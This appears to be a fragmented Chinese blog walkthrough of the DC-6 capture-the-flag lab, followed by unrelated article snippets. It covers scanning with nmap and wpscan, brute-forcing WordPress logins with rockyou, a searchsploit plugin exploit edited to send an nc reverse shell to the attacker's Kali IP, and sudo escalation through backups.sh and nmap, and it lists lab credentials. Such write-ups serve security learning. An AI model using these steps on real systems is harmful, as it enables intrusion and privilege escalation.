arp-scan -l
nmap -sV -O 192.168.160.180
wordpress
内容管理系统;whatweb -v 192.168.160.180
/etc/hosts
里添加一条指定一下即可;Plugins
插件这个单词,猜测可能是插件存在漏洞;W
标志,进一步验证使用了CMS的wordpress
内容管理系统;wpscan --url http://wordy -e u
gunzip /usr/share/wordlists/rockyou.txt.gz rockyou.txt
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt
wpscan --url http://wordy -U user.txt -P passwords.txt
用户: mark
密码: helpdesk01
"插件"
来找突破点;searchsploit
搜索下对应文件,然后使用-p
参数查看下文件的路径;searchsploit activity monitor
searchsploit -p php/webapps/45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html .
// "."的意思是当前目录
localhost:8000 改为 wordy
nc -nlvp 127.0.0.1 改为 nc 192.168.160.176(kali的IP)
45274.html
文件,点击成功反弹shell至kali机上,进行下shell交互方便操作;python -c 'import pty;pty.spawn("/bin/bash")'
/home/mark/stuff
目录下,查看文件成功发现graham
用户的密码;用户: graham
密码: GSo7isUM1D4
graham
用户查看可以执行的操作,发现jens
用户下有个backups.sh
文件,查看是个备份文件;backups.sh
文件里写入/bin/bash
并以jens
的身份去执行该文件,成功切换至jens
用户,再次查看可以执行的操作发现可以无密码使用nmap
命令;getshell
文件,然后以nmap
命令去执行 ,即可提权至root
;
上一篇 > DC-5靶机渗透测试
下一篇 > DC-7靶机渗透测试
以上内容就是DC-6靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟!
以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍
文章浏览阅读1.1w次,点赞7次,收藏34次。vue-grid-layout的使用、实例、遇到的问题和解决方案_vue-grid-layout
文章浏览阅读218次。然后连接一个数据源,就会在下面自动产生一个添加附件的组件。把这个控件复制粘贴到页面里,就可以单独使用来上传了。插入一个“编辑”窗体。_powerapps点击按钮上传附件
文章浏览阅读264次。(1) Abstraction (抽象)(2) Polymorphism (多态)(3) Inheritance (继承)(4) Encapsulation (封装)_"object(cnofd[\"ofdrender\"])十条"
文章浏览阅读133次。删除node_modules,重新npm install看是否成功。在 package.json 文件中的 scripts 中加入。修改你的第三方库的bug等。然后目录会多出一个目录文件。_修改 node_modules
文章浏览阅读883次。【代码】【】kali--password:su的 Authentication failure问题,&sudo passwd root输入密码时Sorry, try again._password: su: authentication failure
文章浏览阅读1w次,点赞13次,收藏97次。整理5个优秀的微信小程序开源项目。收集了微信小程序开发过程中会使用到的资料、问题以及第三方组件库。_微信小程序开源模板
文章浏览阅读128次。Centos7最简搭建NFS服务器_centos7 搭建nfs server
文章浏览阅读1.2k次,点赞2次,收藏3次。前言mybatis在持久层框架中还是比较火的,一般项目都是基于ssm。虽然mybatis可以直接在xml中通过SQL语句操作数据库,很是灵活。但正其操作都要通过SQL语句进行,就必须写大量的xml文件,很是麻烦。mybatis-plus就很好的解决了这个问题。..._mybaitis-plus ruledataobjectattributemapper' and 'com.picc.rule.management.d
文章浏览阅读325次。EECE 1080C / Programming for ECESummer 2022Laboratory 4: Global Functions PracticePlagiarism will not be tolerated:Topics covered:function creation and call statements (emphasis on global functions)Objective:To practice program development b_eece1080c
文章浏览阅读53次。被同机房早就1年前就学过的东西我现在才学,wtcl。设要求的数为\(x\)。设当前处理到第\(k\)个同余式,设\(M = LCM ^ {k - 1} _ {i - 1}\) ,前\(k - 1\)个的通解就是\(x + i * M\)。那么其实第\(k\)个来说,其实就是求一个\(y\)使得\(x + y * M ≡ a_k(mod b_k)\)转化一下就是\(y * M ...
文章浏览阅读1.3k次。首先,问题是如何出现的?晚上复查代码,发现一个activity没有调用自己的ondestroy方法我表示非常的费解,于是我检查了下代码。发现再finish代码之后接了如下代码finish();System.exit(0);//这就是罪魁祸首为什么这样写会出现问题System.exit(0);////看一下函数的原型public static void exit (int code)//Added ..._android 手动杀死app,activity不执行ondestroy
文章浏览阅读894次。Q: SylixOS 版权是什么形式, 是否分为<开发版税>和<运行时版税>.A: SylixOS 是开源并免费的操作系统, 支持 BSD/GPL 协议(GPL 版本暂未确定). 没有任何的运行时版税. 您可以用她来做任何 您喜欢做的项目. 也可以修改 SylixOS 的源代码, 不需要支付任何费用. 当然笔者希望您可以将使用 SylixOS 开发的项目 (不需要开源)或对 SylixOS 源码的修改及时告知笔者.需要指出: SylixOS 本身仅是笔者用来提升自己水平而开发的_select函数 导致堆栈溢出 sylixos